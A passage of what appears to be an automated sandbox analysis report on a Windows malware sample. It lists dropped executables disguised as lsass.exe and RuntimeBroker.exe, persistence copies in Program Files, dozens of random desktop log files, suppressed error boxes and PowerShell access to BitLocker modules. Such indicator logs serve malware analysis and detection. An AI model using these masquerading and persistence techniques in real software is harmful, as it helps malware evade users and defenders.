                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFAAC652316 push 8B485F92h; iretd 10_2_00007FFAAC65231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAAC46D2A5 pushad ; iretd 12_2_00007FFAAC46D2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAAC652316 push 8B485F92h; iretd 12_2_00007FFAAC65231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAAC43D2A5 pushad ; iretd 14_2_00007FFAAC43D2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAAC551030 push E85DF5FBh; ret 14_2_00007FFAAC5510F9
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFAAC622316 push 8B485F95h; iretd 14_2_00007FFAAC62231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAAC46D2A5 pushad ; iretd 16_2_00007FFAAC46D2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAAC652316 push 8B485F92h; iretd 16_2_00007FFAAC65231B
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeCode function: 24_2_00007FFAACC86888 push eax; iretd 24_2_00007FFAACC86899
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeCode function: 24_2_00007FFAACC867D4 push eax; iretd 24_2_00007FFAACC86899

                          Persistence and Installation Behavior

                          barindex
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exeJump to dropped file
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeFile created: C:\RuntimeDll\cef_process.exeJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\zLeRKKNH.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\YztwqAnw.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\ORagGYiO.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\cmPeMAqD.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\rAZKvkEJ.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\lYDDhZsX.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exeJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\iqbcNzlc.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\PqvOIQVP.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\YmBoVQXN.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\zlIjJSaG.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\hiNMadse.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\jJYMqGYt.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\pPutoWtQ.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\jBpuMXxn.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\DhKAQyQA.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\RuntimeBroker.exeJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\HTmgdJna.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\vdXshwoU.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\CNRzgtSC.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\HOdrnIxw.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\eNXvjbiz.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\jWRUMqoc.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\iesEpfvs.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\CtGsekUC.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\owqLTDnh.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\RuntimeDll\mOBsSQwwQhAobhYfNDABCsnt.exeJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\ykSQugis.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\MOnylpdT.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\WkOFzhSS.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\zPzZvHLt.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\uqHSBmkN.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\FelIlyfv.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\wjWAnjWL.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\WtmFjUlP.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\UdNNkMkD.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\KMBPPFZY.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\GWKYIJYf.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\ZVuWGvdL.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\DJEawqoG.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\vZJioLKA.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\tFkkvTtJ.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\CfUiBMYm.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\Yimecftu.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\ZfOmxfIp.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\UicXeyNX.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\QEeosldM.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\hCXTblqe.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\djqniAFy.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exeJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\iqbcNzlc.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\zPzZvHLt.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\hCXTblqe.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\PqvOIQVP.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\vZJioLKA.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\UdNNkMkD.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\KMBPPFZY.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\tFkkvTtJ.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\rAZKvkEJ.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\jWRUMqoc.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\Yimecftu.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\QEeosldM.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\GWKYIJYf.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\pPutoWtQ.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\MOnylpdT.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\CfUiBMYm.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\lYDDhZsX.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\ZfOmxfIp.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\HTmgdJna.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\ykSQugis.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\hiNMadse.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\YztwqAnw.logJump to dropped file
                          Source: C:\RuntimeDll\cef_process.exeFile created: C:\Users\user\Desktop\ORagGYiO.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\wjWAnjWL.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\WtmFjUlP.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\DhKAQyQA.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\cmPeMAqD.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\zlIjJSaG.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\iesEpfvs.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\FelIlyfv.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\uqHSBmkN.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\djqniAFy.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\CtGsekUC.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\DJEawqoG.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\vdXshwoU.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\UicXeyNX.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\zLeRKKNH.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\jJYMqGYt.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\ZVuWGvdL.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\HOdrnIxw.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\owqLTDnh.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\eNXvjbiz.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\WkOFzhSS.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\CNRzgtSC.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\jBpuMXxn.logJump to dropped file
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeFile created: C:\Users\user\Desktop\YmBoVQXN.logJump to dropped file

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\RuntimeDll\cef_process.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
